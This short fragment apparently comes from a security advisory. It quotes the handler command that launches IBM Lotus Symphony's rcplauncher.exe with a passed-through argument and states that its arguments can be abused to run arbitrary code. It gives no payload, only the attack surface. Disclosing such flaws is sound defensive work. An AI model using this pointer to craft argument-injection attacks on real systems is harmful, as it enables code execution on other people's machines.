This handler executes "D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe" -config notes -com.ibm.rcp.portal.app.ui#openCA "%1" the rcplauncher process accepts various arguments which can be abused to execute arbitrary code.
